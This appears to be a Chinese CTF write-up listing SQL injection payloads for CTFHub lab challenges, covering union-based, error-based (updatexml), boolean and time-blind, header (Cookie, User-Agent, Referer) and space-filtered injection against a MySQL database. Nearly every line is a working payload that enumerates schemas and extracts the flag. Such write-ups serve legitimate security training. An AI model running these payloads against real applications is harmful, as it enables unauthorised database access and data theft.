1.整数型注入
?id= - 1 order by 2
?id= - 1 order by 3
?id= - 1 union select 1 , 2
id= - 1 union select 1 , group_concat( schema_name) from information_schema. schemata
?id= - 1 union select 1 , group_concat( table_name) from information_schema. tables where table_schema= 'sqli'
id= - 1 union select 1 , group_concat( column_name) from information_schema. columns where table_name= 'flag'
id= - 1 union select 1 , ( select flag from sqli. flag)
2.字符型注入
?id= 1 ' and ' 1 '=' 1 true
?id= 1 ' and ' 1 '=' 2 flase
?id= 1 ' order by 2 -- + #存在两个字段
?id=-1' union select database ( ) , user ( )
?id= - 1 ' union select 1,group_concat(schema_name) from information_schema.schemata -- + #数据库
?id=-1' union select 1 , group_concat( table_name) from information_schema. tables where table_schema= 'sqli'
?id= - 1 ' union select 1,group_concat(column_name) from information_schema.columns where table_name=' flag' -- + #查询列名
?id=-1' union select 1 , group_concat( flag) from sqli. flag
3.报错注入
?id= 1 AND ( updatexml( 1 , concat( 0x5e24 , ( select database ( ) ) , 0x5e24 ) , 1 ) )
?id= 1 AND ( updatexml( 1 , concat( 0x5e24 , ( select group_concat( table_name) from information_schema. tables where table_schema= 'sqli' ) , 0x5e24 ) , 1 ) )
?id= 1 AND ( updatexml( 1 , concat( 0x5e24 , ( select group_concat( column_name) from information_schema. columns where table_name= 'flag' ) , 0x5e24 ) , 1 ) )
?id= 1 AND ( updatexml( 1 , concat( 0x5e24 , ( select group_concat( flag) from sqli. flag) , 0x5e24 ) , 1 ) )
ctfhub{0 b5ac19a8d3f9241fa18ee7 但是不完整
?id= 1 AND ( updatexml( 1 , concat( 0x5e24 , ( select mid ( group_concat( flag) , 20 , 30 ) from sqli. flag) , 0x5e24 ) , 1 ) )
4.布尔注入
?id= 1 and length( database ( ) ) = 4
?id= 1 and ascii( substr( database ( ) , 1 , 1 ) ) > 70
?id= 1 and substr( database ( ) , 1 , 1 ) = 's'
?id= 1 and substr( database ( ) , 2 , 1 ) = 'q'
?id= 1 and substr( database ( ) , 1 , 4 ) = 'sqli'
id= 1 and substr( ( select group_concat( table_name) from information_schema. tables where table_schema= 'sqli' limit 0 , 1 ) , 1 , 1 ) = 'n'
id= 1 and substr( ( select group_concat( table_name) from information_schema. tables where table_schema= 'sqli' limit 0 , 1 ) , 1 , 4 ) = 'news'
?id= 1 and substr( ( select table_name from information_schema. tables where table_schema= 'sqli' limit 1 , 1 ) , 1 , 4 ) = 'flag'
?id= 1 and ascii( substr( ( select column_name from information_schema. columns where table_name= 'flag' ) , 1 , 1 ) ) > 110
id= 1 and ascii( substr( ( select * from sqli. flag where id= 1 ) , 1 , 1 ) ) > 110
?id= 1 and substr( ( select flag from sqli. flag where id= 1 ) , 1 , 1 ) = 'c'
5.时间盲注
步骤和布尔同理
?id= 1 and if ( substr( database ( ) , 1 , 1 ) = 's' , sleep( 5 ) , 1 )
?id= 1 and if ( substr( ( select flag from sqli. flag where id= 1 ) , 1 , 1 ) = 'c' , sleep( 5 ) , 1 )
5.MYSQL结构
和第一、二种类似
?id= - 1 union select database ( ) , group_concat( schema_name) from information_schema. schemata
?id= - 1 union select database ( ) , group_concat( table_name) from information_schema. tables where table_schema= 'sqli'
?id= - 1 union select database ( ) , group_concat( column_name) from information_schema. columns where table_name= 'malbfjuabq'
?id= - 1 union select database ( ) , group_concat( cvffvpkrwi) from sqli. malbfjuabq
6.Cookie 注入
和前面类似
Cookie: id= 1 order by 2
7.UA注入
和前面类似
User - Agent:1 order by 2
8.Referer注入
和前面类似
referer:1 union select 1 , 2
9.过滤空格
?id= 0 union select 1 , database ( )
?id= 0 union select 1 , group_concat( table_name) from information_schema. tables where table_schema= 'sqli'
?id= 0 union select 1 , group_concat( column_name) from information_schema. columns where table_name= 'ssdfpmgfcc'
?id= 0 union select 1 , group_concat( xrnmfbhzqk) from sqli. ssdfpmgfcc